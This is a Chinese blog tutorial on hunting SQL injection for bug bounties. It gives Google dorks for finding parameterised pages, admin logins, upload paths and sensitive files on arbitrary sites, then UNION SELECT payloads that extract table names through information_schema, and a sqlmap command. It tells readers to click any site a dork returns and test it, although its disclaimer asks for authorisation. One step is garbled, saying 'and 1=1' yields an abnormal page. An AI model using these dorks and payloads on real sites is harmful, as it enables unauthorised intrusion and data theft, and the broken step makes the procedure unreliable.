- 147、PHP实现机器人的运动范围
- 2构建LangChain应用程序的示例代码:9、使用Anthropic API生成结构化输出的工具教程_anthropic api密钥获取与使用指南
- 3mysql面试(三)
- 4GPT2.0语言模型 Language Models are Unsupervised Multitask Learners
- 5在windows系统中部署odoo14开发环境+pycharm配置_pycharm 0doo
- 6目标检测---YOLOV5从部署到使用_yolov5的result.render()
- 7【教程】python2.7下载、安装及配置
- 8不能启动u盘 uefi_国产开源工具:U盘启动工具Ventoy——墨涩网
- 9解决GitHub中releases下载过慢甚至失败的问题_github releases
- 10MacOS Nginx前端部署+常用命令+更改端口_mac nginx
超级干货!如何挖公益SRC实战/SQL注入_怎么挖sql注入src
赞
踩
目录
一、信息收集
1.查找带有ID传参的网站(可以查找sql注入漏洞)
inurl:asp id=xx
2.查找网站后台(多数有登陆框,可以查找弱口令,暴力破解等漏洞)
site:http://xxxx.com “admin”
site:http://xx.com intext:管理
site:http://xx.com inurl:login
site:http://xx.com intitle:后台
3.查看上传漏洞
site:http://xx.com inurl:file
site:http://xx.com inurl:load
4.查找敏感文件
filetype:mdb|doc|xlsx|pdf
二、实战演示
1.谷歌语法搜索inurl:php id=62
随便点进一个带有id传参=62的网站,大概率存在SQL注入
2.判断是否存在SQL注入漏洞,显示页面正常id=62 and 1=1
3.id=62 and 1=1显示页面不正常,已经肯定存在SQL注入
4.查找列数id=62 order by 10
发现列数是10
5.查看回显点id=111111 union select 1,2,3,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database() limit 0,1-- qwe
6.输出表名id=111111 union select 1,2,3,4,5,6,table_name,8,9,10 from information_schema.tables where table_schema=database() limit 0,1-- qwe
三、使用sqlmap进行验证
使用sqlmap命令查看库名sqlmap.py -u url --dbs
四、总结
1.谷歌语法找到注入点
2.判断注入是否存在
3.查找列数
4.查找表名
5.使用sqlmap进行验证
第一次投稿,觉得这次实战记录很适合新手小白挖SRC,希望多多支持!
申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.
没看够~?欢迎关注!
